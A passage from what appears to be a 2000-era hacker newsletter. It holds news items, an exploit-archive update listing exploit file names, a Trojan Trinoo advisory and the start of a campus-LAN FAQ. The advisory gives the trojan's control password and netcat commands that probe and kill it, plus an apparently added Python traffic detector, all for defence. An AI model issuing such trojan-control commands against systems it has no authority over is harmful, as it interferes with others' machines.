      for authorized personnel. From there, he was able to look at teachers' 
      files that include past and current grades, according to the school 
      resource officer's report. 

      The officer, Deputy Ron Frink, said a school district technology 
      specialist told him Johnson was in an area that took two security password 
      clearances to penetrate. 

      Smith said the boy confessed. He also said it doesn't appear that Johnson 
      actually changed any grades. 

      "I have no indication that there was anything other than him bragging 
      happening," Smith said. 

      The computer hacking charge is a third-degree felony, and Johnson would 
      have faced as many as five years in prison if convicted as an adult. Had 
      he actually changed his grades, the charge would have been upgraded to a 
      second-degree felony, which carries a prison term of up to 15 years. 

      Because he is charged as a juvenile, he faces a more limited penalty, 
      which could include counseling. 
      
      @HWA
      

21.0 Defense Agency plans cyber-terrorism unit 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Contributed by SugarKing	

     Source: The Daily Yomiuri
     url: http://www.yomiuri.co.jp/newse/0218cr06.htm
     
     NAHA -- The Defense Agency is planning to establish a unit in the 
     Self-Defense Forces dedicated to combating hacking against key computer 
     systems, as part of the five-year defense buildup program beginning in 
     fiscal 2001, Ken Sato, administrative vice minister of the agency, said 
     Thursday. 

     "We recognize that studying how to defend against cyber-terrorism as part 
     of an intelligence war is a major challenge we face," Sato told a news 
     conference at the SDF Naha Base in Okinawa Prefecture. 

     "We would like to create an organization to conduct comprehensive research, 
     and a combat unit to deal with attacks (by hackers)." 

     Cyber-terrorism includes the destruction or incapacitation of computer 
     systems by hackers infiltrating networks through telephone lines. 

     Pressure has been growing on the government to take swift action to better 
     prepare the nation against cyber-terrorism since hackers invaded central 
     government Web sites earlier this year. 

     The agency has requested about 2.7 billion yen in the fiscal 2000 budget 
     for computer system crisis management. 

     The allocation is seen as a precursor to the establishment of a research 
     institute and a cyber-terrorism combat unit in the next defense buildup 
     program, Sato said. 

     The specifics of the organization and unit have yet to be worked out, but 
     they are expected to work in close cooperation--similar to the way in which 
     the Ground Self-Defense Force's chemical school and defense unit operate. 


      @HWA


22.0  HACK.CO.ZA is back online.
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by gov-boi and Cruciphux
      
      
      As of Feb 22nd (or thereabouts) http://www.hack.co.za/
      re-opened its doors and came back online with an updated
      site.
      
      The site had previously been offline due to a series of
      heavy DoS attacks which caused the main ISP to cut service
      to the site in order to maintain network integrity. The
      site was mirrored elsewhere during this time.
      
      gov-boi may be reached at: camis@qttech.co.za
      
      
      Public files added recently to the site: *The '0-day' 
      area still exists. You must send an unreleased overflow
      or exploit to gov-boi in order to access this private
      passworded section. Access remains for 14 days or until
      you submit another exploit/overflow for the collection,
      this ensures a fresh supply of files. - Ed
      
      -[[ 25 Feb ]]-
      Added nispasswd.c Solaris 2.5.1 local overflow.
      Added flexlm.sh Solaris (x86/7.0/2.6) local exploit.
      Added l-amd.tgz RPC remote overflow by lamagra.
      Added xdestroy.c Xwin dos exploit by blasphemy.
      Added slzbserv.c WinNT remote overflow by | Zan.
      Added inetserv-exp.c WinNT remote overflow by dr_fdisk^.

      -[[ 23 Feb ]]-
      Added apcd.sh Debian 2.1 local exploit.
      Added instructor.c OpenBSD 2.5 DoS attack.
      Added shellgen_exp.c Linux/Misc local overflow.
      Added ADMsximap.c Solaris x86 remote overflow.
      Added linux.2.2.x.icmp.dos.c Redhat 6.0 DoS attack.
      Added vchkpw.c FreeBSD 3.4 remote overflow by K2.
      Added procfs.c FreeBSD 3.3 local overflow by Nergal.
      Added uw-ppptalk.c Unixware 7.1 local overflow by K2.
      Added asmon.sh FreeBSD (3.4, 3.3, 3.2, 3.1, 3.0) local exploit.
      Added cfing.c Fingerd 1.3.3 remote bsd overflow by babcia.
      Added proftp-ppc.c ProFTP pre(1-6) remote overflow by lamagra.
      
      
      
      @HWA
      
22.1  Hack.co.za appears to be offline again (Mar 11th)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      On attempting to access the site last evening, the site for
      Online Anarchy came up. It appeared to be a clan-gaming
      site, and not a hack or defacement.
      
      By appearances it looked like a DNS reroute or NS screwup.
      No further info is available and the site may be back online
      by the time you read this. - Ed
      
      @HWA      

23.0  Dangerous Hacking Agent (Troj_Trinoo) Discovered (2 pcs)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced from: http://www.pure-security.net/
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Daily News
      Dangerous Hacking Agent Discovered
      By Dick Kelsey, Newsbytes.
      February 23, 2000

      Another, more dangerous Trojan "in the wild" agent can stage
      deliberate denial of service (DDoS) attacks on Windows
      environments, Trend Micro Inc., said today.

      "We've discovered a new agent," Trend Micro Public Education
      Director David Perry told Newsbytes. "Rather than targeting
      Solaris boxes, it targets Windows NT, 95 and 98." The agent,
      identified as TROJ_TRINOO, gives hackers access to a
      network through a vulnerable point on a computer within the
      system.

      Perry said Solaris has great security and is operated by a
      top-notch staff. "Yet they were broken into and used for this
      attack, which points to the fact that this (a spate of DDoS
      attacks 2 weeks ago) was not done by a 15-year-old kid," he
      said. "Someone had to go in and figure out which ports were
      vulnerable, then hack into the site. This took someone with
      hacking skills."

      Trend Micro, which makes centrally controlled server-based
      virus protection and content-filtering products, said
      TROJ_TRINOO has been seen in the wild but is not believed to
      have carried out any mass attacks. The agent zeroes in on
      users with cable modems or digital subscriber lines (DSL).

      Perry said users can scan their systems at the company's site,
      http://housecall.antivirus.com, for so-called "sleeper agents," a
      reference to US troops taken prisoner during the Korean War
      and brainwashed to become unwitting agents for the enemy. "If
      you are a sleeper, you want to remove it, then let your ISP
      (Internet service provider) know what happens," Perry said.

      Two weeks ago today Yahoo was brought down by a DDoS
      attack, followed by other, less debilitating attacks on eBay,
      Excite and several other major sites.

      Trend Micro can be found on the Web at
      http://www.trendmicro.com .   Reported by Newsbytes.com
      
      -=-
      
      
      Further information from Simple Nomad:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: WinNT2kSecurity list
      
      From: Simple Nomad <thegnome@NMRC.ORG>
      To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
      Sent: Sunday, February 27, 2000 12:51 AM
      Subject: Troj_Trinoo and ZZ
      
      
      RAZOR has acquired a copy of the Trojan Trinoo. Here is a bit of
      information about it. Sorry this isn't in official "advisory" style of
      writing, but I really wanted to get this info out quickly.
       
      The trojan is called service.exe, but could be renamed. It is 23145 bytes
      in length. To remove it you must kill it in memory, remove its entry at
      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, and
      delete the file from the hard drive. Make sure you delete the correct
      file, and not services.exe.
      
      It listens on udp port 34555, and will respond to pings on udp port 35555.
      The password is "[]..Ks" (without the quotes). Therefore the following
      will detect it:
       
       Set up a netcat listener:
            nc -u -n -l -p 35555 -v -w 100
       
       Send a trinoo ping:
            echo 'png []..Ks l44' | nc -u -n -v -w 3 192.168.1.5 34555
       
      The listener will display PONG if a trinoo daemon is listening.
       
       This will kill it:
            echo 'd1e []..Ks l44' | nc -u -n -v -w 3 192.168.1.5 34555
       
      After it is killed, the udp port may still be bound until a reboot, at
      least on Windows 95/98. Subsequent trinoo pings will return an ICMP
      destination unreachable/port unreachable if it is down.
       
      I've updated the unix version of Zombie Zapper to reflect this. You can
      download it from http://razor.bindview.com/tools/ZombieZapper_form.shtml,
      look for the Unix version 1.1 with Trinoo Trojan support near the bottom
      of the page. Hopefully we'll have a Windows NT version available sometime
      Monday.
       
      Both Seth McGann and Todd Sabin of RAZOR contributed heavily to the info
      above after disassembling the trojan. And special thanks to Gary Flynn at
      James Madison University for supplying RAZOR with a sample for testing.
       
       -         Simple Nomad          -  No rest for the Wicca'd  -
       -      thegnome@nmrc.org        -        www.nmrc.org       -
       -  thegnome@razor.bindview.com  -     razor.bindview.com    -
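
      Added example (not part of Simple Nomad's post or RAZOR's tools): a
      passive check that applies the indicators given above (commands to
      udp 34555 carrying the "[]..Ks" password, PONG replies to udp 35555)
      to packet records. The record format, the sample lines, the 5-second
      reply window and all function names are assumptions made up for
      illustration.

```python
"""Flag Troj_Trinoo control traffic in UDP packet records (added example)."""
from collections import defaultdict

DAEMON_PORT = 34555                         # trojan listens here (from the post)
REPLY_PORT = 35555                          # trojan answers pings here (from the post)
PASSWORD = "[]..Ks"                         # password quoted in the post
COMMANDS = {"png": "ping", "d1e": "kill"}   # the two commands shown in the post
REPLY_WINDOW = 5.0                          # seconds; assumed correlation window

# Constructed sample, assumed format:
#   <epoch> <src>:<sport> > <dst>:<dport> <payload text>
SAMPLE = """\
951612660.10 10.0.0.9:1042 > 10.0.0.23:34555 png []..Ks l44
951612660.12 10.0.0.23:1027 > 10.0.0.9:35555 PONG
951612661.40 10.0.0.9:1043 > 10.0.0.24:34555 png []..Ks l44
951612700.00 10.0.0.50:53 > 10.0.0.24:34555 unrelated data
951612710.25 10.0.0.9:1044 > 10.0.0.23:34555 d1e []..Ks l44
951612800.00 10.0.0.77:2000 > 10.0.0.9:35555 PONG
this line is malformed
"""


def parse_record(line):
    """Return (ts, src, sport, dst, dport, payload) or None if unparsable."""
    parts = line.split(None, 4)
    if len(parts) < 4 or parts[2] != ">":
        return None
    try:
        ts = float(parts[0])
        src, sport = parts[1].rsplit(":", 1)
        dst, dport = parts[3].rsplit(":", 1)
        sport, dport = int(sport), int(dport)
    except ValueError:
        return None
    payload = parts[4].strip() if len(parts) == 5 else ""
    return ts, src, sport, dst, dport, payload


def classify_command(payload):
    """Name the trinoo command if the payload is '<cmd> <password> ...'."""
    tokens = payload.split()
    if len(tokens) >= 2 and tokens[0] in COMMANDS and tokens[1] == PASSWORD:
        return COMMANDS[tokens[0]]
    return None


def analyze(lines):
    """Map each host to a sorted list of evidence labels."""
    evidence = defaultdict(set)
    pending = {}  # (pinger, target) -> timestamp of the last ping seen
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # skip noise instead of aborting the whole run
        ts, src, _sport, dst, dport, payload = rec
        if dport == DAEMON_PORT:
            cmd = classify_command(payload)
            if cmd is None:
                # Traffic to the port without the password: weak signal only.
                evidence[dst].add("other-udp-34555")
            else:
                evidence[dst].add("command:" + cmd)
                if cmd == "ping":
                    pending[(src, dst)] = ts
        elif dport == REPLY_PORT and payload.upper().startswith("PONG"):
            # A PONG means a daemon answered; src is the host running it.
            sent = pending.pop((dst, src), None)
            if sent is not None and 0 <= ts - sent <= REPLY_WINDOW:
                evidence[src].add("pong-solicited")
            else:
                evidence[src].add("pong-unsolicited")
    return {host: sorted(ev) for host, ev in evidence.items()}


def likely_infected(findings):
    """Hosts that sent a PONG, i.e. a daemon was answering on them."""
    return sorted(h for h, ev in findings.items()
                  if any(e.startswith("pong") for e in ev))


if __name__ == "__main__":
    results = analyze(SAMPLE.splitlines())
    for host in sorted(results):
        print(host, ", ".join(results[host]))
    print("likely infected:", likely_infected(results))
```

      A host that only received a ping and never answered (10.0.0.24 in
      the sample) is not listed as infected; only a PONG counts as proof
      that a daemon was running.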
       
      
      
      @HWA
      
      
24.0  Tech info: The BIG-LAN FAQ.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Helpful info for administrating (or hacking) your school or other
      larger networks.
      
      (From a usenet post by YMEY)


      BIG-LAN Frequently Asked Questions
      
      Last Updated: July 24, 1995
      
      Acknowledgements: A lot of people provided information for me and I
      freely admit that I have not recorded the list of names.  Thanks
      to all.
      
      Contents
      --------
      I. About BIG-LAN
      II. Explanation of this Memo
      III. Sources of Information on Campus Networks
        1. Must-Read Sources
        2. A Few General Sources
        3. LISTSERV Mailing Lists
        4. Internet Mailing Lists
        5. Internet Mailing Lists with automatic subscription
        6. USENET/Netnews Groups
        7. Anonymous FTP-based Archive Sites
        8. LISTSERV-based Archive Sites
        9. RFCs (Internet "Request For Comments")
        10. Other Useful Online Papers
        11. Sources of Protocol Documents
        12. Useful Free Software
        13. Books
        14. Periodicals
        15. Training Courses
        16. Conferences
      IV. Basic Glossary on Campus Networks
      V. Frequently Asked Questions on Campus Networks
        1. What is the difference between Ethernet and IEEE 802.3?
        2. What is encapsulation?  What do I have to know about it?
        3. How do I know whether to use a router or a bridge?
        4. How do I know whether to use a bridge or a repeater?  How many
           repeaters may I put on an Ethernet?
        5. Should I use "manageable" hubs, concentrators, etc on my LAN?
        6. Which LAN technology should I use?  Arcnet?  FDDI?  Token Ring?
           10BASE-T?
        7. What is the ideal cable to install in a new building?
        8. What is the ideal cable to install between buildings on a campus?
        9. Whose routers are recommended?
        10. Whose bridges are recommended?
        11. Whose Ethernet equipment are recommended?
        12. Whose Token Ring equipment are recommended?
        13. Whose FDDI equipment are recommended?
        14. What PC network software is recommended?
        15. What protocols should run on a campus-wide LAN?
        16. What software is recommended for managing a campus-wide LAN?
        17. What terminal server is recommended?
        18. Whose troubleshooting equipment are recommended?
        19. What security products should I buy?
        20. Should the names of devices on my campus LAN have subdomains?
        21. Should client stations use POP?  Should they use just SMTP?
            Should I use some non-TCP/IP protocol for mail to/from client
            stations?
        22. Should I enable SQE/heartbeat?
        23. If I have a thinwire network interface card, how do I connect it
            to a 10BASE-T concentrator?
        24. How much does a collision slow down an Ethernet packet?
        25. Should I worry about Ethernet tailgating?
      
      I. About BIG-LAN
      
         BIG-LAN is a mailing list for discussion of issues in designing and
         operating Campus-Size Local Area Networks, especially complex
         ones utilizing multiple technologies and supporting multiple
         protocols.  Topics include repeaters, bridges, routers and
         gateways; how to incorporate smaller Personal-Computer type LANs
         into the campus-wide LAN; how to unify the mail systems, etc.
         This is an ideal list in which to debate the relative merits of
         bridges vs routers.
      
         All requests to be added to or deleted from this list, problems,
         questions, etc., should be sent to big-lan-request@listserv.syr.edu.
         Those familiar with LISTSERV can subscribe with
         listserv@listserv.syr.edu.
      
         Archives are available through listserv@listserv.syr.edu and
         ftp://syr.edu/information/archives/big-lan/
      
         Coordinator: John Wobus <jmwobus@syr.edu>
      
      II. Explanation of this Memo
      
           Since BIG-LAN is not specific to any protocol family, it will
           not cover any particular protocol family in detail, e.g.  this
           is not a TCP/IP/Internet FAQ Memo.  Fortunately, there are some
           good TCP/IP FAQ Memos which are listed in the sources of
           information below.
      
           Suggestions, corrections, and contributions welcome.  Please
           send them to:
      
                      jmwobus@syr.edu
      
           An up-to-date copy of this memo may be retrieved via URL:
      
                http://web.syr.edu/~jmwobus/comfaqs/big-lan.faq
      
      III. Sources of Information on Campus Networks
      
           This list favors "network" sources of information: available on
           the Internet and/or BITNET and other similar networks; if you
           have access to BIG-LAN then you have access to one of these
           networks; and these sources are not the kind which you can
           discover through vendors, books, bookstores, or libraries.
      
        1. Must-Read Sources
      
            These are documents that you definitely should get and read if you
            have questions about Campus Networks.
      
          a. Charles Spurgeon's reading list (see below under "Other Useful
              Online Papers").
          b. RFCs 1175, 1594, 1207, and 1392 (see below under "RFCs").
      
        2. A Few General Sources
      
           These are network resources & mechanisms for getting all kinds
           of information--not just on Networking; thus we can't cover them
           very thoroughly in this memo.
      
          a. LISTSERV - mailing list servers & file servers on BITNET,
              accessible via e-mail.  Can be reached and used from a lot of
              networks.  Mail the command INFO to any LISTSERV for help.
              Also have database commands (i.e. search commands) for archives
              they store.
          b. Usenet News/Netnews: distributed bulletin board with discussions
              on lots of topics.  Distributed through the Internet and through
              UUCP.
          c. Anonymous ftp: the main way to make files available on the
              Internet.  ftp to a site using username "anonymous".  A
              password is always demanded--sometimes a banner tells you what
              to use--otherwise "guest" almost always works.
          d. Archie servers - network-accessible databases of where to get
              files via anonymous ftp.  Access is through telnet, rlogin,
              mail, or a special "archie" protocol.  To use via telnet,
              enter username archie.  Some servers: archie.ans.net,
              archie.sura.net, archie.mcgill.edu, archie.unl.edu.
          e. WAIS - Internet-accessible databases on different topics.
              Available via WAIS protocol (basically Z39.50).  Client
              (and server) software is collected on quake.think.com as
              well as a WAIS database of WAIS servers.
          f. ftplist.txt - collected list of anonymous ftp sites.
              Stored lots of places in anonymous ftp including syr.edu.
          g. Internet gopher - something like anonymous ftp only more
              advanced:  to get started, I suggest ftping
              boombox.micro.umn.edu and getting information on gopher.  A
              number of sites have servers.
          h. Internet List of lists: available by anonymous ftp from
              ftp.nisc.sri.com, or through a mail-based file server
              at mailserver@nisc.sri.com.
          i. LISTSERV internal list of lists.  Available by mailing the
              command LIST GLOBAL to any LISTSERV.
          j. news.answers - newsgroup that distributes Frequently Asked
              Questions memos for lots of Netnews groups.
          k. FAQ archive available via anonymous ftp on rtfm.mit.edu.
              From the archives of news.answers, Frequently Asked Question
              memos for lots of Netnews groups.
          l. news.announce.newusers - has periodic postings about how to
              use Usenet/Netnews and also a lot about mailing lists.
          m. BITFTP.  A BITNET server that allows BITNET sites to use the
              Internet's File Transfer Protocol to send/receive files to
              ftpable Internet sites.  For more information, send mail
              to BITFTP@PUCC with HELP as the message body.
          n. Database of lists managed by LISTSERV@VM1.NODAK.EDU.  Use through
              LISTSERV's database interface.
          o. Maas files--Indexes & abstracts about various services available
              via Internet & BITNET including some related to campus networks.
              Available via anonymous ftp from ftp.unt.edu.
          p. NETSCOUT@VMTECMEX.BITNET mailing list.  A list to exchange
              information on the location of network resources.
              LISTSERV-based so use instructions below to subscribe, etc.
          q. World Wide Web servers.  You need WWW or Mosaic software to
              access them.  A good server to start with is www.ncsa.uiuc.edu.
              Mosaic is available from ftp.ncsa.uiuc.edu.
      
      
        3. LISTSERV Mailing Lists
      
            Send a "SUBSCRIBE" command to LISTSERV@foo, e.g.
                    SUBSCRIBE BIG-LAN John Doe
      
          a. BIG-LAN@LISTSERV.SYR.EDU
          b. NOVELL@LISTSERV.SYR.EDU
          c. CDROMLAN@IDBSU.BITNET/IDBSU.IDBSU.EDU
          d. BANYAN-L@AKRONVM.BITNET
          e. CW-EMAIL@TECMTYVM.BITNET    (Campus Wide E-mail)
          f. CWIS-L@WUVMD.BITNET         (Campus Wide Information Systems)
          g. IBM-NETS@BITNIC.BITNET
          h. LWUSERS@NDSUVM1.BITNET      (LANWatch User List)
          i. TN3270-L@RUTVM1.BITNET
          j. 3COM-L@NUSVM.BITNET
          k. HELP-NET@TEMPLEVM.BITNET    (Help re networking software)
          l. LANWORKS@MIAMIU.BITNET      (LanWorks PCSA stuff)
          m. LANMAN-L@NIHLIST.BITNET     (MS LAN MAN stuff)
      
        4. Internet Mailing Lists
      
            Send a subscription request for list foo to foo-request@blah
      
          a. big-lan@listserv.syr.edu             (gives you 2 ways)
          b. cisco@spot.colorado.edu
          c. p4200@comet.cit.cornell.edu          (Proteon routers)
          d. tcp-ip@nic.ddn.mil
          e. netblazer-users@telebit.com
          f. info-appletalk@andrew.cmu.edu
          g. net-ops@nsl.dec.com
          h. nfs@tmc.edu
          i. wellfleet-l@nstn.ns.ca
          j. ospf@trantor.umd.edu               (OSPF IP routing protocol)
          k. pop@jhunix.hcf.jhu.edu
          l. bind@ucbarpa.berkeley.edu
          m. pc-ip@udel.edu
          n. drivers@sun.soe.clarkson.edu       (Packet Drivers)
          o. cell-relay@indiana.edu         (gatewayed to comp.dcom.cell-relay)
      
        5. Internet Mailing Lists with automatic subscription
      
           Send a "SUBSCRIBE" command to the listed server.
      
          a. firewalls@greatcircle.com          majordomo@greatcircle.com
                                                (about firewall routers)
          b. firewalls-digest@greatcircle.com   majordomo@greatcircle.com
                                                (same list in digested form)
      
        6. USENET/Netnews Groups
      
          a. comp.dcom.*          lans.*, modems, sys.cisco, telecom, ...
          b. comp.protocols.*     appletalk, tcp-ip.*, ibm, ppp, ...
          c. comp.sys.proteon
          d. comp.sys.novell
          e. comp.sys.mac.comm
          f. bit.listserv.big-lan  (Note: these groups give Netnews
          g. bit.listserv.novell     readers a way to read the corresponding
          h. bit.listserv.cwis-l      LISTSERV lists)
          i. bit.listserv.cw-mail
          j. bit.listserv.3com-l
          k. alt.dcom.*           catv, telecom, ...
      
        7. Anonymous FTP-based Archive Sites
      
          a. syr.edu: BIG-LAN mailing list; NOVELL mailing list; a collection
              of network-oriented papers & faq memos.
          b. spot.colorado.edu: cisco mailing list & some other network stuff
          c. hsdndev.harvard.edu: (in ndtl/results) Results of Scott
              Bradner's router benchmarks.
          d. ftp.uu.net: a treasure trove of software.
          e. wuarchive.wustl.edu: a treasure trove of software.
          f. ftp.ftp.com: packet drivers, some Unix software, other stuff.
          g. ftp.utexas.edu: collection of networking info & software--
              a lot of good information about Ethernet.
          h. ftp.novell.com: files Novell makes available.  Mirrored at
              netlab2.usu.edu, bnug.proteon.com, ftp.rg.nl, tui.lincoln.ac.nz.
          i. ftp.cisco.com: files Cisco makes available & some interesting
              applications.
          j. gatekeeper.dec.com: a treasure trove of software & stuff
              (the stuff that was on decwrl.dec.com).
          k. lux.levels.unisa.edu.au: files that 3Com distributes via
              Compuserve.
          l. ftp.unt.edu: Maas files and other goodies.
          m. oak.oakland.edu: "the simtel collection, formerly at
              simtel20.army.mil"; a treasure trove of software, including
              packet drivers (pd1:<msdos.pktdrvr>).  Mirrored on ftp.uu.net
              and wuarchive.wustl.edu.
          n. osi.ncsl.nist.gov: online copies of GOSIP & related documents.
      
        8. LISTSERV-based Archive Sites
      
           The brave can mail the command "INFO FILES" and/or the command
           "INFO DATABASE" to the LISTSERV for instructions.
      
          a. LISTSERV@LISTSERV.SYR.EDU: BIG-LAN & NOVELL mailing list archives.
      
        9. RFCs (Internet "Request For Comments")
      
           Some anonymous ftp sites for RFCs: nic.ddn.mil, ftp.nisc.sri.com,
           nis.nsf.net, nisc.jvnc.net, venera.isi.edu, wuarchive.wustl.edu,
           ftp.salford.ac.uk.
           There are also some mail-based file servers:
           mailserver@nisc.sri.com, info-server@nnsc.nsf.net, and
           sendrfc@jvnc.net.
      
          a. RFC1470: FYI on a network management tool catalog: Tools for
              monitoring and debugging TCP/IP internets and interconnected
              devices
          b. RFC1175: FYI on where to start: A bibliography of
              internetworking information
          c. RFC1594: FYI on Questions and Answers: Answers to Commonly asked
              "New Internet User" Questions
          d. RFC1178: Choosing a name for your computer
          e. RFC1207: FYI on Questions and Answers: Answers to commonly
              asked "experienced Internet user" questions
          f. RFC1244: Site Security Handbook
          g. RFC1118: Hitchhiker's Guide to the Internet
          h. RFC1122 & RFC1123: Requirements for Internet Hosts
          i. RFC1208: A Glossary of Networking Terms
          j. RFC1180: A TCP/IP Tutorial
          k. RFC1173: Responsibilities of Host and Network Managers:  A
              Summary of the Oral Tradition of the Internet
          l. IAB Official Protocol Standards (Currently RFC1540 but it is
              periodically updated & given a new RFC number)
          m. Assigned Numbers (Currently RFC1340 but it is periodically
              updated & given a new RFC number; Includes field-values for
              protocols in the TCP/IP family as well as some others)
          n. RFC1392: Internet User's Glossary
      
      
        10. Other Useful Online Papers
      
          a. Charles Spurgeon. "Network Reading List: TCP/IP, UNIX, and
              Ethernet".  Available via anonymous ftp from ftp.utexas.edu
              in directory pub/netinfo/docs as net-read.txt and netread-ps.
              Also available via electronic-mail-based archive server.  Send
              the word "help" in the subject header or body of a message
              to archive-server@ftp.utexas.edu for more information.
              Also available via www.
          b. Charles Hedrick. "Introduction to the Administration of an
              Internet-based Local Network".  Available via anonymous ftp
              from cs.rutgers.edu as runet/tcp-ip-admin.doc (also .ps).
          c. Charles Hedrick.  "Introduction to Internet Protocols."
              Available via anonymous ftp from cs.rutgers.edu as
              runet/tcp-ip-intro.doc (also .ps).
          d. Unofficial lists of codes used on 802.3 & Ethernet networks.
              Portions of the official list are not released, so various
              people compile unofficial lists.  One that is available via
              anonymous ftp is Michael Patton's pub/map/EtherNet-Codes
              on ftp.lcs.mit.edu.  See also RFC: "Assigned Numbers".
          e. Arthur Green: "Frequently Asked Questions for
              NOVELL@LISTSERV.SYR.EDU Mailing List."  Available via anonymous
              ftp from midir.ucd.ie.
          f. Brendan Kehoe: "Zen and the Art of the Internet: A Beginner's
              Guide to the Internet."  Available via anonymous ftp from
              ftp.cs.widener.edu in the pub/zen directory.
          g. ATM Bibliography.  Available via anonymous ftp from
              mythos.ucs.indiana.edu.
          h. John Wobus.  "Lan Mail Protocols".  Available via anonymous ftp
              from syr.edu under information/faqs/lan-mail-protocols
          i. John Wobus.  "Lan Technology".  Available via anonymous ftp from
              syr.edu under information/faqs/lan-technology
          j. Charles Spurgeon. "Guide to Ethernet".  Available via anonymous
              ftp from ftp.utexas.edu in pub/netinfo/ethernet as ethernet-guide.ps.
              See a above.
          k. Charles Spurgeon. "Guide to Ethernet Configuration".  Available via
              anonymous ftp from ftp.utexas.edu in pub/netinfo/ethernet as
              ethernet-config.ps.
      
      
        11. Sources of Protocol Documents
      
          a. Ethernet V2   DEC-Direct; 1-800-344-4825; DEC Part Number
                            AA-K759B-TK.
      
          b. IEEE 802      (802.3, Token Ring, 10BASE-T, etc) IEEE;
                            1-800-678-IEEE.
          c. TCP/IP        RFCs.  See RFCs (above).
          d. AppleTalk     APDA; 1-800-282-APDA.  Now a book in the
                            "Inside" series.
          e. OSI           Omnicom Inc.; 1-800-666-4266.
          f. DECNet        DEC.
          g. SNA           IBM.
          h. Novell(IPX)   Built on XNS; rest is designed by Novell.
          i. FDDI          ANSI; 1-212-642-4900.
                            Also Global Engineering Documents; 1-800-854-7179.
                            2805 McGaw Avenue; PO Box 19539; Irvine, CA 92714;
                            1-714-261-1455.
          j. CCITT         United Nations book shop in New York
                            Some of the documents are available via ftp from
                            world.std.com & ftp.uu.net & other sites.
          k. GOSIP         NTIS Sales Dept; (703)487-4650; Document
                            FIPS 146-1; See also Anonymous FTP-based Archive
                            Sites
          l. XNS           Xerox.
      
        12. Useful Free Software
           (see also RFC1470; listed above)
      
          a. CUTCP           (TCP/IP client for PCs) sun.soe.clarkson.edu,
                              omnigate.clarkson.edu
          b. NCSA Telnet     (Telnet clients for PCs & Macs) ftp.nsca.uiuc.edu
          c. Eudora          (POP3 Client for Macs) ux1.cso.uiuc.edu
          d. POPmail         (POP3 Client for PCs & Macs)
                              boombox.micro.umn.edu
          e. PCROUTE         (Makes IP router out of PC) accuvax.nwu.edu
          f. PCBRIDGE        (Makes bridge out of PC) accuvax.nwu.edu
          g. Packet Drivers  (Drivers for various PC LAN cards)
                              oak.oakland.edu
      
          h. WinQVT          (IP clients for Windows) ftp.cica.indiana.edu
          i. ka9q            (TCP/IP for PCs and Macs) ucsd.edu
          j. PC/IP           (TCP/IP client for MS-DOS) husc6.harvard.edu
          k. charon          (Pegasus/smtp gateway) omnigate.clarkson.edu
          l. CAP             (AppleTalk for Unix systems) rutgers.edu,
                              munnari.oz.au, gatekeeper.dec.com
          m. Popper          (POP3 server for Unix systems)
                              ftp.cc.berkeley.edu
          n. Trumpet         (PC Newsreader) oak.oakland.edu
          o. bootpd          (Bootp Daemon for Unix) lancaster.andrew.cmu.edu
          p. NUPOP           (POP3 daemon for MS-DOS) ftp.acns.nwu.edu
          q. NETWATCH        (PC Network watching program) netlab1.usu.edu
          r. iupop3          (POP3 server for VMS) mythos.ucs.indiana.edu
          s. Beholder        (PC Network watching program) ?
          t. KarlBridge      (PC-based filter bridge)
                              nisca.acs.ohio-state.edu
          u. Mosaic          (multifaceted information/news client)
                              ftp.ncsa.uiuc.edu
          v. Gopher          (client/server information system) boombox?
          w. Pegasus         (Mail client for PCs & Macs) risc.ua.edu
          x. Kermit          (terminal emulator) Columbia U
          y. netatalk        (AppleTalk for UNIX Systems)
                              terminator.rs.itd.umich.edu
          z. etherman        (X-based Ethernet monitoring) ftp.cs.curtin.edu.au
          aa. interman        (X-based IP monitoring) ftp.cs.curtin.edu.au
          bb. packetman       (Ethernet packet analyzer) ftp.cs.curtin.edu.au
      
        13. Books
      
          The following books were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good books for administrators of
          Campus-sized LANs:
      
          a. Douglas Comer.  Internetworking with TCP/IP.
          b. Albitz & Liu.  DNS and BIND.
          c. Mark Miller.  Troubleshooting Internetworks.
          d. Ed Krol.  The Whole Internet.
          e. Marshall Rose.  The Simple Book.
          f. Craig Hunt.  TCP/IP Network Administration.
          g. Andrew Tanenbaum.  Computer Networks.
          h. Nemeth, Snyder & Seebass.  Unix System Administration Handbook.
          i. Stevens.  Unix Network Programming.
          j. Martin A. W. Nemzow.  Keeping The Link (McGraw-Hill).
          k. Radia Perlman.  Interconnections.
          l. Inside AppleTalk.
          m. Caroline Arms.  Campus Networking Strategies.  Digital Press.
              Out of print.
      
          Also mentioned were books published by O'Reilly in general.
      
        14. Periodicals
      
          The following periodicals were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good periodicals for administrators of
          Campus-sized LANs:
      
          a. Network World
          b. Data Communications
          c. LAN Magazine
          d. LAN Times
          e. Communications Week
          f. PC Week
          g. Network Computing
          h. InfoWorld
          i. ConneXions
          j. Byte
          k. Unix World
          l. Macworld
          m. MacWEEK
          n. PC Magazine
          o. Open Systems Today
          p. Network Management
          q. Lightwave
      
        15. Training Courses
      
          The following providers of tutorials were mentioned by responders
          to the 12/93 BIG-LAN Reader Survey:
      
          a. Interop Tutorials
          b. Cisco training
          c. Westnet training
          d. Network World: Understanding SNMP
          e. Trellis training
          f. TC3 Land/Wan Video
          g. TC3 NetWare 3.11
          h. PDA Data Communications
          i. Hewlett-Packard free seminars
          j. Fred Prior Project Management Seminars
          k. CRAY Research training program
          l. Banyan training
      
        16. Conferences
      
          The following conferences were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good conferences for administrators of
          Campus-sized LANs:
      
          a. Interop
          b. EDUCOM
          c. Networld
          d. Comnet
          e. Association of Banyan Users International
          f. ACUTA
      
      IV. Basic Glossary on Campus Networks
      
         Another glossary is RFC1208.  See "Online Papers" above.
      
           100BASE-T - A set of proposals to the IEEE 802.3 for 100Mbps
